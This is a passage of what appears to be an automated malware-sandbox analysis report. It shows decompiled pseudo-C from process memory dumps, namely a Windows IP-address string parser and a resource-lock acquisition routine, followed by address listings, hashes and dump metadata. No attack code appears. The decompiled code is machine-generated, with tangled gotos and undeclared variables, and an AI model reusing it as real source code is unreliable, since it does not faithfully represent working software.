                                                                                                                                                    						goto L6;
                                                                                                                                                    					}
                                                                                                                                                    					_t121 = E02520CFA(_v28, _t180, 0x10);
                                                                                                                                                    					_t183 = _t183 + 0xc;
                                                                                                                                                    					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                    					goto L47;
                                                                                                                                                    				} else {
                                                                                                                                                    					while(1) {
                                                                                                                                                    						_t123 = _v16;
                                                                                                                                                    						if(_t123 == 0) {
                                                                                                                                                    							goto L7;
                                                                                                                                                    						}
                                                                                                                                                    						_t108 = _t123 - 1;
                                                                                                                                                    						if(_t108 != 0) {
                                                                                                                                                    							goto L1;
                                                                                                                                                    						}
                                                                                                                                                    						_t178 = _t141;
                                                                                                                                                    						if(E025206BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                    							if(E025206BA(_t135, _t178) == 0 || E02520A5B(_t136, _t178) == 0) {
                                                                                                                                                    								if(_t141 != 0x3a) {
                                                                                                                                                    									if(_t141 == 0x2e) {
                                                                                                                                                    										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                    											goto L41;
                                                                                                                                                    										} else {
                                                                                                                                                    											_v24 = _v24 + 1;
                                                                                                                                                    											L27:
                                                                                                                                                    											_v16 = _v16 & 0x00000000;
                                                                                                                                                    											L28:
                                                                                                                                                    											if(_v28 == 0) {
                                                                                                                                                    												goto L20;
                                                                                                                                                    											}
                                                                                                                                                    											_t177 = _v24;
                                                                                                                                                    											if(_t177 != 0) {
                                                                                                                                                    												if(_v12 > 3) {
                                                                                                                                                    													L6:
                                                                                                                                                    													return 0xc000000d;
                                                                                                                                                    												}
                                                                                                                                                    												_t132 = E02520CFA(_v28, 0, 0xa);
                                                                                                                                                    												_t183 = _t183 + 0xc;
                                                                                                                                                    												if(_t132 > 0xff) {
                                                                                                                                                    													goto L6;
                                                                                                                                                    												}
                                                                                                                                                    												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                    												goto L20;
                                                                                                                                                    											}
                                                                                                                                                    											if(_v12 > 4) {
                                                                                                                                                    												goto L6;
                                                                                                                                                    											}
                                                                                                                                                    											_t133 = E02520CFA(_v28, 0, 0x10);
                                                                                                                                                    											_t183 = _t183 + 0xc;
                                                                                                                                                    											_v20 = _v20 + 1;
                                                                                                                                                    											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                    											goto L20;
                                                                                                                                                    										}
                                                                                                                                                    									}
                                                                                                                                                    									goto L41;
                                                                                                                                                    								}
                                                                                                                                                    								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                    									goto L41;
                                                                                                                                                    								} else {
                                                                                                                                                    									_t130 = _t179 + 1;
                                                                                                                                                    									if( *_t130 == _t141) {
                                                                                                                                                    										if(_v32 != 0) {
                                                                                                                                                    											goto L41;
                                                                                                                                                    										}
                                                                                                                                                    										_v32 = _v8 + 1;
                                                                                                                                                    										_t156 = 2;
                                                                                                                                                    										_v8 = _v8 + _t156;
                                                                                                                                                    										L34:
                                                                                                                                                    										_t179 = _t130;
                                                                                                                                                    										_v16 = _t156;
                                                                                                                                                    										goto L28;
                                                                                                                                                    									}
                                                                                                                                                    									_v8 = _v8 + 1;
                                                                                                                                                    									goto L27;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								_v12 = _v12 + 1;
                                                                                                                                                    								if(_v24 > 0) {
                                                                                                                                                    									goto L41;
                                                                                                                                                    								}
                                                                                                                                                    								_a7 = 1;
                                                                                                                                                    								goto L20;
                                                                                                                                                    							}
                                                                                                                                                    						} else {
                                                                                                                                                    							_v12 = _v12 + 1;
                                                                                                                                                    							L20:
                                                                                                                                                    							_t179 = _t179 + 1;
                                                                                                                                                    							_t141 =  *_t179;
                                                                                                                                                    							if(_t141 == 0) {
                                                                                                                                                    								goto L41;
                                                                                                                                                    							}
                                                                                                                                                    							continue;
                                                                                                                                                    						}
                                                                                                                                                    						L7:
                                                                                                                                                    						if(_t141 == 0x3a) {
                                                                                                                                                    							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                    								goto L41;
                                                                                                                                                    							} else {
                                                                                                                                                    								_t130 = _t179 + 1;
                                                                                                                                                    								if( *_t130 != _t141) {
                                                                                                                                                    									goto L41;
                                                                                                                                                    								}
                                                                                                                                                    								_v20 = _v20 + 1;
                                                                                                                                                    								_t156 = 2;
                                                                                                                                                    								_v32 = 1;
                                                                                                                                                    								_v8 = _t156;
                                                                                                                                                    								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                    								goto L34;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						L8:
                                                                                                                                                    						if(_v8 > 7) {
                                                                                                                                                    							goto L41;
                                                                                                                                                    						}
                                                                                                                                                    						_t142 = _t141;
                                                                                                                                                    						if(E025206BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                    							if(E025206BA(_t124, _t142) == 0 || E02520A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                    								goto L41;
                                                                                                                                                    							} else {
                                                                                                                                                    								_t128 = 1;
                                                                                                                                                    								_a7 = 1;
                                                                                                                                                    								_v28 = _t179;
                                                                                                                                                    								_v16 = 1;
                                                                                                                                                    								_v12 = 1;
                                                                                                                                                    								L39:
                                                                                                                                                    								if(_v16 == _t128) {
                                                                                                                                                    									goto L20;
                                                                                                                                                    								}
                                                                                                                                                    								goto L28;
                                                                                                                                                    							}
                                                                                                                                                    						} else {
                                                                                                                                                    							_a7 = 0;
                                                                                                                                                    							_v28 = _t179;
                                                                                                                                                    							_v16 = 1;
                                                                                                                                                    							_v12 = 1;
                                                                                                                                                    							goto L20;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				L1:
                                                                                                                                                    				_t123 = _t108 == 1;
                                                                                                                                                    				if(_t108 == 1) {
                                                                                                                                                    					goto L8;
                                                                                                                                                    				}
                                                                                                                                                    				_t128 = 1;
                                                                                                                                                    				goto L39;
                                                                                                                                                    			}


























                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fassign
                                                                                                                                                    • String ID: .$:$:
                                                                                                                                                    • API String ID: 3965848254-2308638275
                                                                                                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                    • Instruction ID: 68f2d68548699b0d1c3c004f032fe04e55769f15c8b687c6201ba3fe28af6288
                                                                                                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                    • Instruction Fuzzy Hash: 4AA180B190222ADFCF24CF54C8446BEFBB9BB66308F24846AD442B72C0D734964DCB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 49%
                                                                                                                                                    			E02520554(signed int _a4, char _a8) {
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int* _t49;
                                                                                                                                                    				signed int _t51;
                                                                                                                                                    				signed int _t56;
                                                                                                                                                    				signed int _t58;
                                                                                                                                                    				signed int _t61;
                                                                                                                                                    				signed int _t63;
                                                                                                                                                    				void* _t66;
                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                    				signed int _t70;
                                                                                                                                                    				void* _t75;
                                                                                                                                                    				signed int _t81;
                                                                                                                                                    				signed int _t84;
                                                                                                                                                    				void* _t86;
                                                                                                                                                    				signed int _t93;
                                                                                                                                                    				signed int _t96;
                                                                                                                                                    				intOrPtr _t105;
                                                                                                                                                    				signed int _t107;
                                                                                                                                                    				void* _t110;
                                                                                                                                                    				signed int _t115;
                                                                                                                                                    				signed int* _t119;
                                                                                                                                                    				void* _t125;
                                                                                                                                                    				void* _t126;
                                                                                                                                                    				signed int _t128;
                                                                                                                                                    				signed int _t130;
                                                                                                                                                    				signed int _t138;
                                                                                                                                                    				signed int _t144;
                                                                                                                                                    				void* _t158;
                                                                                                                                                    				void* _t159;
                                                                                                                                                    				void* _t160;
                                                                                                                                                    
                                                                                                                                                    				_t96 = _a4;
                                                                                                                                                    				_t115 =  *(_t96 + 0x28);
                                                                                                                                                    				_push(_t138);
                                                                                                                                                    				if(_t115 < 0) {
                                                                                                                                                    					_t105 =  *[fs:0x18];
                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                    						goto L6;
                                                                                                                                                    					} else {
                                                                                                                                                    						__eflags = _t115 | 0xffffffff;
                                                                                                                                                    						asm("lock xadd [eax], edx");
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					L6:
                                                                                                                                                    					_push(_t128);
                                                                                                                                                    					while(1) {
                                                                                                                                                    						L7:
                                                                                                                                                    						__eflags = _t115;
                                                                                                                                                    						if(_t115 >= 0) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						__eflags = _a8;
                                                                                                                                                    						if(_a8 == 0) {
                                                                                                                                                    							__eflags = 0;
                                                                                                                                                    							return 0;
                                                                                                                                                    						} else {
                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                    							_t49 = _t96 + 0x1c;
                                                                                                                                                    							_t106 = 1;
                                                                                                                                                    							asm("lock xadd [edx], ecx");
                                                                                                                                                    							_t115 =  *(_t96 + 0x28);
                                                                                                                                                    							__eflags = _t115;
                                                                                                                                                    							if(_t115 < 0) {
                                                                                                                                                    								L23:
                                                                                                                                                    								_t130 = 0;
                                                                                                                                                    								__eflags = 0;
                                                                                                                                                    								while(1) {
                                                                                                                                                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x025c01c0;
                                                                                                                                                    									_push(_t144);
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_t51 = E024DF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                    									__eflags = _t51 - 0x102;
                                                                                                                                                    									if(_t51 != 0x102) {
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t106 =  *(_t144 + 4);
                                                                                                                                                    									_t126 =  *_t144;
                                                                                                                                                    									_t86 = E02524FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                    									_push(_t126);
                                                                                                                                                    									_push(_t86);
                                                                                                                                                    									E02533F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                    									E02533F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                    									_t130 = _t130 + 1;
                                                                                                                                                    									_t160 = _t158 + 0x28;
                                                                                                                                                    									__eflags = _t130 - 2;
                                                                                                                                                    									if(__eflags > 0) {
                                                                                                                                                    										E0256217A(_t106, __eflags, _t96);
                                                                                                                                                    									}
                                                                                                                                                    									_push("RTL: Re-Waiting\n");
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_push(0x65);
                                                                                                                                                    									E02533F92();
                                                                                                                                                    									_t158 = _t160 + 0xc;
                                                                                                                                                    								}
                                                                                                                                                    								__eflags = _t51;
                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                    									_push(_t51);
                                                                                                                                                    									E02523915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                    									asm("int3");
                                                                                                                                                    									while(1) {
                                                                                                                                                    										L32:
                                                                                                                                                    										__eflags = _a8;
                                                                                                                                                    										if(_a8 == 0) {
                                                                                                                                                    											break;
                                                                                                                                                    										}
                                                                                                                                                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                    										_t119 = _t96 + 0x24;
                                                                                                                                                    										_t107 = 1;
                                                                                                                                                    										asm("lock xadd [eax], ecx");
                                                                                                                                                    										_t56 =  *(_t96 + 0x28);
                                                                                                                                                    										_a4 = _t56;
                                                                                                                                                    										__eflags = _t56;
                                                                                                                                                    										if(_t56 != 0) {
                                                                                                                                                    											L40:
                                                                                                                                                    											_t128 = 0;
                                                                                                                                                    											__eflags = 0;
                                                                                                                                                    											while(1) {
                                                                                                                                                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                    												asm("sbb esi, esi");
                                                                                                                                                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x025c01c0;
                                                                                                                                                    												_push(_t138);
                                                                                                                                                    												_push(0);
                                                                                                                                                    												_t58 = E024DF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                    												__eflags = _t58 - 0x102;
                                                                                                                                                    												if(_t58 != 0x102) {
                                                                                                                                                    													break;
                                                                                                                                                    												}
                                                                                                                                                    												_t107 =  *(_t138 + 4);
                                                                                                                                                    												_t125 =  *_t138;
                                                                                                                                                    												_t75 = E02524FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                    												_push(_t125);
                                                                                                                                                    												_push(_t75);
                                                                                                                                                    												E02533F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                    												E02533F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                    												_t128 = _t128 + 1;
                                                                                                                                                    												_t159 = _t158 + 0x28;
                                                                                                                                                    												__eflags = _t128 - 2;
                                                                                                                                                    												if(__eflags > 0) {
                                                                                                                                                    													E0256217A(_t107, __eflags, _t96);
                                                                                                                                                    												}
                                                                                                                                                    												_push("RTL: Re-Waiting\n");
                                                                                                                                                    												_push(0);
                                                                                                                                                    												_push(0x65);
                                                                                                                                                    												E02533F92();
                                                                                                                                                    												_t158 = _t159 + 0xc;
                                                                                                                                                    											}
                                                                                                                                                    											__eflags = _t58;
                                                                                                                                                    											if(__eflags < 0) {
                                                                                                                                                    												_push(_t58);
                                                                                                                                                    												E02523915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                    												asm("int3");
                                                                                                                                                    												_t61 =  *_t107;
                                                                                                                                                    												 *_t107 = 0;
                                                                                                                                                    												__eflags = _t61;
                                                                                                                                                    												if(_t61 == 0) {
                                                                                                                                                    													L1:
                                                                                                                                                    													_t63 = E02505384(_t138 + 0x24);
                                                                                                                                                    													if(_t63 != 0) {
                                                                                                                                                    														goto L52;
                                                                                                                                                    													} else {
                                                                                                                                                    														goto L2;
                                                                                                                                                    													}
                                                                                                                                                    												} else {
                                                                                                                                                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                    													_push( &_a4);
                                                                                                                                                    													_push(_t61);
                                                                                                                                                    													_t70 = E024DF970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                    													__eflags = _t70;
                                                                                                                                                    													if(__eflags >= 0) {
                                                                                                                                                    														goto L1;
                                                                                                                                                    													} else {
                                                                                                                                                    														_push(_t70);
                                                                                                                                                    														E02523915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                    														L52:
                                                                                                                                                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                    														_push( &_a4);
                                                                                                                                                    														_push(1);
                                                                                                                                                    														_t63 = E024DF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                    														__eflags = _t63;
                                                                                                                                                    														if(__eflags >= 0) {
                                                                                                                                                    															L2:
                                                                                                                                                    															return _t63;
                                                                                                                                                    														} else {
                                                                                                                                                    															_push(_t63);
                                                                                                                                                    															E02523915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                    															_push( &_a4);
                                                                                                                                                    															_push(1);
                                                                                                                                                    															_t63 = E024DF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                    															__eflags = _t63;
                                                                                                                                                    															if(__eflags >= 0) {
                                                                                                                                                    																goto L2;
                                                                                                                                                    															} else {
                                                                                                                                                    																_push(_t63);
                                                                                                                                                    																_t66 = E02523915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                    																asm("int3");
                                                                                                                                                    																while(1) {
                                                                                                                                                    																	_t110 = _t66;
                                                                                                                                                    																	__eflags = _t66 - 1;
                                                                                                                                                    																	if(_t66 != 1) {
                                                                                                                                                    																		break;
                                                                                                                                                    																	}
                                                                                                                                                    																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                    																	_t66 = _t110;
                                                                                                                                                    																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                    																	__eflags = _t66 - _t110;
                                                                                                                                                    																	if(_t66 != _t110) {
                                                                                                                                                    																		continue;
                                                                                                                                                    																	} else {
                                                                                                                                                    																		_t67 =  *[fs:0x18];
                                                                                                                                                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                    																		return _t67;
                                                                                                                                                    																	}
                                                                                                                                                    																	goto L58;
                                                                                                                                                    																}
                                                                                                                                                    																E02505329(_t110, _t138);
                                                                                                                                                    																return E025053A5(_t138, 1);
                                                                                                                                                    															}
                                                                                                                                                    														}
                                                                                                                                                    													}
                                                                                                                                                    												}
                                                                                                                                                    											} else {
                                                                                                                                                    												_t56 =  *(_t96 + 0x28);
                                                                                                                                                    												goto L3;
                                                                                                                                                    											}
                                                                                                                                                    										} else {
                                                                                                                                                    											_t107 =  *_t119;
                                                                                                                                                    											__eflags = _t107;
                                                                                                                                                    											if(__eflags > 0) {
                                                                                                                                                    												while(1) {
                                                                                                                                                    													_t81 = _t107;
                                                                                                                                                    													asm("lock cmpxchg [edi], esi");
                                                                                                                                                    													__eflags = _t81 - _t107;
                                                                                                                                                    													if(_t81 == _t107) {
                                                                                                                                                    														break;
                                                                                                                                                    													}
                                                                                                                                                    													_t107 = _t81;
                                                                                                                                                    													__eflags = _t81;
                                                                                                                                                    													if(_t81 > 0) {
                                                                                                                                                    														continue;
                                                                                                                                                    													}
                                                                                                                                                    													break;
                                                                                                                                                    												}
                                                                                                                                                    												_t56 = _a4;
                                                                                                                                                    												__eflags = _t107;
                                                                                                                                                    											}
                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                    												while(1) {
                                                                                                                                                    													L3:
                                                                                                                                                    													__eflags = _t56;
                                                                                                                                                    													if(_t56 != 0) {
                                                                                                                                                    														goto L32;
                                                                                                                                                    													}
                                                                                                                                                    													_t107 = _t107 | 0xffffffff;
                                                                                                                                                    													_t56 = 0;
                                                                                                                                                    													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                    													__eflags = 0;
                                                                                                                                                    													if(0 != 0) {
                                                                                                                                                    														continue;
                                                                                                                                                    													} else {
                                                                                                                                                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                    														return 1;
                                                                                                                                                    													}
                                                                                                                                                    													goto L58;
                                                                                                                                                    												}
                                                                                                                                                    												continue;
                                                                                                                                                    											} else {
                                                                                                                                                    												goto L40;
                                                                                                                                                    											}
                                                                                                                                                    										}
                                                                                                                                                    										goto L58;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags = 0;
                                                                                                                                                    									return 0;
                                                                                                                                                    								} else {
                                                                                                                                                    									_t115 =  *(_t96 + 0x28);
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								_t106 =  *_t49;
                                                                                                                                                    								__eflags = _t106;
                                                                                                                                                    								if(__eflags > 0) {
                                                                                                                                                    									while(1) {
                                                                                                                                                    										_t93 = _t106;
                                                                                                                                                    										asm("lock cmpxchg [edi], esi");
                                                                                                                                                    										__eflags = _t93 - _t106;
                                                                                                                                                    										if(_t93 == _t106) {
                                                                                                                                                    											break;
                                                                                                                                                    										}
                                                                                                                                                    										_t106 = _t93;
                                                                                                                                                    										__eflags = _t93;
                                                                                                                                                    										if(_t93 > 0) {
                                                                                                                                                    											continue;
                                                                                                                                                    										}
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags = _t106;
                                                                                                                                                    								}
                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                    									continue;
                                                                                                                                                    								} else {
                                                                                                                                                    									goto L23;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						goto L58;
                                                                                                                                                    					}
                                                                                                                                                    					_t84 = _t115;
                                                                                                                                                    					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                    					__eflags = _t84 - _t115;
                                                                                                                                                    					if(_t84 != _t115) {
                                                                                                                                                    						_t115 = _t84;
                                                                                                                                                    						goto L7;
                                                                                                                                                    					} else {
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				L58:
                                                                                                                                                    			}



































                                                                                                                                                    0x0254225b
                                                                                                                                                    0x0254225f
                                                                                                                                                    0x02542189
                                                                                                                                                    0x0254218c
                                                                                                                                                    0x0254218f
                                                                                                                                                    0x02542194
                                                                                                                                                    0x02542199
                                                                                                                                                    0x0254219d
                                                                                                                                                    0x025421a0
                                                                                                                                                    0x025421a2
                                                                                                                                                    0x025421ce
                                                                                                                                                    0x025421ce
                                                                                                                                                    0x025421ce
                                                                                                                                                    0x025421d0
                                                                                                                                                    0x025421d6
                                                                                                                                                    0x025421de
                                                                                                                                                    0x025421e2
                                                                                                                                                    0x025421e8
                                                                                                                                                    0x025421e9
                                                                                                                                                    0x025421ec
                                                                                                                                                    0x025421f1
                                                                                                                                                    0x025421f6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025421f8
                                                                                                                                                    0x025421fb
                                                                                                                                                    0x02542206
                                                                                                                                                    0x0254220b
                                                                                                                                                    0x0254220c
                                                                                                                                                    0x02542217
                                                                                                                                                    0x02542226
                                                                                                                                                    0x0254222b
                                                                                                                                                    0x0254222c
                                                                                                                                                    0x0254222f
                                                                                                                                                    0x02542232
                                                                                                                                                    0x02542235
                                                                                                                                                    0x02542235
                                                                                                                                                    0x0254223a
                                                                                                                                                    0x0254223f
                                                                                                                                                    0x02542241
                                                                                                                                                    0x02542243
                                                                                                                                                    0x02542248
                                                                                                                                                    0x02542248
                                                                                                                                                    0x0254224d
                                                                                                                                                    0x0254224f
                                                                                                                                                    0x02542262
                                                                                                                                                    0x02542263
                                                                                                                                                    0x02542268
                                                                                                                                                    0x02542269
                                                                                                                                                    0x02542269
                                                                                                                                                    0x02542269
                                                                                                                                                    0x0254226d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02542276
                                                                                                                                                    0x02542279
                                                                                                                                                    0x0254227e
                                                                                                                                                    0x02542283
                                                                                                                                                    0x02542287
                                                                                                                                                    0x0254228a
                                                                                                                                                    0x0254228d
                                                                                                                                                    0x0254228f
                                                                                                                                                    0x025422bc
                                                                                                                                                    0x025422bc
                                                                                                                                                    0x025422bc
                                                                                                                                                    0x025422be
                                                                                                                                                    0x025422c4
                                                                                                                                                    0x025422cc
                                                                                                                                                    0x025422d0
                                                                                                                                                    0x025422d6
                                                                                                                                                    0x025422d7
                                                                                                                                                    0x025422da
                                                                                                                                                    0x025422df
                                                                                                                                                    0x025422e4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025422e6
                                                                                                                                                    0x025422e9
                                                                                                                                                    0x025422f4
                                                                                                                                                    0x025422f9
                                                                                                                                                    0x025422fa
                                                                                                                                                    0x02542305
                                                                                                                                                    0x02542314
                                                                                                                                                    0x02542319
                                                                                                                                                    0x0254231a
                                                                                                                                                    0x0254231d
                                                                                                                                                    0x02542320
                                                                                                                                                    0x02542323
                                                                                                                                                    0x02542323
                                                                                                                                                    0x02542328
                                                                                                                                                    0x0254232d
                                                                                                                                                    0x0254232f
                                                                                                                                                    0x02542331
                                                                                                                                                    0x02542336
                                                                                                                                                    0x02542336
                                                                                                                                                    0x0254233b
                                                                                                                                                    0x0254233d
                                                                                                                                                    0x02542350
                                                                                                                                                    0x02542351
                                                                                                                                                    0x02542356
                                                                                                                                                    0x02542359
                                                                                                                                                    0x02542359
                                                                                                                                                    0x0254235b
                                                                                                                                                    0x0254235d
                                                                                                                                                    0x02505367
                                                                                                                                                    0x0250536b
                                                                                                                                                    0x02505372
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02542363
                                                                                                                                                    0x02542363
                                                                                                                                                    0x02542369
                                                                                                                                                    0x0254236a
                                                                                                                                                    0x0254236c
                                                                                                                                                    0x02542371
                                                                                                                                                    0x02542373
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02542379
                                                                                                                                                    0x02542379
                                                                                                                                                    0x0254237a
                                                                                                                                                    0x0254237f
                                                                                                                                                    0x0254237f
                                                                                                                                                    0x02542385
                                                                                                                                                    0x02542386
                                                                                                                                                    0x02542389
                                                                                                                                                    0x0254238e
                                                                                                                                                    0x02542390
                                                                                                                                                    0x02505378
                                                                                                                                                    0x0250537c
                                                                                                                                                    0x02542396
                                                                                                                                                    0x02542396
                                                                                                                                                    0x02542397
                                                                                                                                                    0x0254239c
                                                                                                                                                    0x025423a2
                                                                                                                                                    0x025423a3
                                                                                                                                                    0x025423a6
                                                                                                                                                    0x025423ab
                                                                                                                                                    0x025423ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025423b3
                                                                                                                                                    0x025423b3
                                                                                                                                                    0x025423b4
                                                                                                                                                    0x025423b9
                                                                                                                                                    0x025423ba
                                                                                                                                                    0x025423ba
                                                                                                                                                    0x025423bc
                                                                                                                                                    0x025423bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02539153
                                                                                                                                                    0x02539158
                                                                                                                                                    0x0253915a
                                                                                                                                                    0x0253915e
                                                                                                                                                    0x02539160
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02539166
                                                                                                                                                    0x02539166
                                                                                                                                                    0x02539171
                                                                                                                                                    0x02539176
                                                                                                                                                    0x02539176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02539160
                                                                                                                                                    0x025423c6
                                                                                                                                                    0x025423d7
                                                                                                                                                    0x025423d7
                                                                                                                                                    0x025423ad
                                                                                                                                                    0x02542390
                                                                                                                                                    0x02542373
                                                                                                                                                    0x0254233f
                                                                                                                                                    0x0254233f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254233f
                                                                                                                                                    0x02542291
                                                                                                                                                    0x02542291

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02542206
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-4236105082
                                                                                                                                                    • Opcode ID: 9469cab7991303735dddfe00092845cdfb858b218bfea2efab557bcef9c2ec08
                                                                                                                                                    • Instruction ID: 4b1e220cb7483a349f0dd8fa2d42bfa3e9af2af52715fcee311336abd15630f9
